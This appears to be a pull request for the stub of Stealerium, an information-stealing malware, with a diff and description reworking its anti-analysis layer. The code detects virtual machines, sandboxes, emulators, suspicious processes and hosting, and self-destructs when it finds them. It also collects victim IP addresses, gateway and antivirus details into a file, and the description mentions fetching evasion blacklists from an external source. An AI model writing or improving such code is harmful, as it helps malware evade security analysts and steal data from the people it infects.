### PR TITLE
refactor: enhance anti-analysis with blacklist checks and async loading

### DIFF
--- a/Stealerium.Stub/Program.cs
+++ b/Stealerium.Stub/Program.cs
@@ -24,7 +24,7 @@ namespace Stealerium.Stub
             ServicePointManager.DefaultConnectionLimit = 9999;
 
             // Run AntiAnalysis modules first
-            if (await AntiAnalysis.RunAsync().ConfigureAwait(false))
+            if (AntiAnalysis.Run())
             {
                 Logging.Log("AntiAnalysis: Detected suspicious environment. Initiating self-destruct.");
                 SelfDestruct.Melt();

--- a/Stealerium.Stub/Stealerium.Stub.csproj
+++ b/Stealerium.Stub/Stealerium.Stub.csproj
@@ -82,6 +82,7 @@
     <Reference Include="System.Numerics" />
     <Reference Include="System.Runtime.Serialization" />
     <Reference Include="System.Security" />
+    <Reference Include="System.ServiceProcess" />
     <Reference Include="System.Windows.Forms" />
     <Reference Include="System.Xml.Linq" />
     <Reference Include="System.Data.DataSetExtensions" />

--- a/Stealerium.Stub/Target/System/Info.cs
+++ b/Stealerium.Stub/Target/System/Info.cs
@@ -7,13 +7,23 @@ namespace Stealerium.Stub.Target.System
 {
     internal sealed class SysInfo
     {
+        /// <summary>
+        /// Saves system information to the specified path.
+        /// </summary>
+        /// <param name="sSavePath">The file path where system info will be saved.</param>
         public static void Save(string sSavePath)
         {
             try
             {
+                // Fetch hosting status synchronously
+                bool hostingStatus = AntiAnalysis.Run();
+
+                // Fetch external IP synchronously
+                string externalIp = SystemInfo.GetPublicIpAsync().GetAwaiter().GetResult();
+
                 var systemInfoText = ""
                                      + "\n[IP]"
-                                     + "\nExternal IP: " + SystemInfo.GetPublicIpAsync()
+                                     + "\nExternal IP: " + externalIp
                                      + "\nInternal IP: " + SystemInfo.GetLocalIp()
                                      + "\nGateway IP: " + SystemInfo.GetDefaultGateway()
                                      + "\n"
@@ -33,16 +43,15 @@ namespace Stealerium.Stub.Target.System
                                      + "\nVirtualMachine: " + AntiAnalysis.VirtualBox()
                                      + "\nSandBoxie: " + AntiAnalysis.SandBox()
                                      + "\nEmulator: " + AntiAnalysis.Emulator()
-                                     + "\nDebugger: " + AntiAnalysis.Debugger()
-                                     + "\nProcesses: " + AntiAnalysis.Processes()
-                                     + "\nHosting: " + AntiAnalysis.HostingAsync()
+                                     + "\nProcesses: " + AntiAnalysis.SuspiciousProcess()
+                                     + "\nHosting: " + hostingStatus
                                      + "\nAntivirus: " + SystemInfo.GetAntivirus()
                                      + "\n";
 
                 // Output the system info to the console
                 Console.WriteLine(systemInfoText);
 
-                // Save the system info to a file
+                // Save the system info to a file synchronously
                 File.WriteAllText(sSavePath, systemInfoText);
             }
             catch (Exception ex)


### PR DESCRIPTION
- Replaced Process/Service/VM/Emulator/Sandbox checks with blacklist-based detection
- Added URLs for fetching blacklists from an external source and implemented concurrent async loading of these lists
- Replaced `Thread.Sleep` with `Task.Delay` for non-blocking waits
- Removed old Process detection and integrated new SuspiciousProcess check
- Modified `RunAsync` method to `Run` for synchronous execution of blacklists loading and anti-analysis checks
- Added error handling and logging for each detection method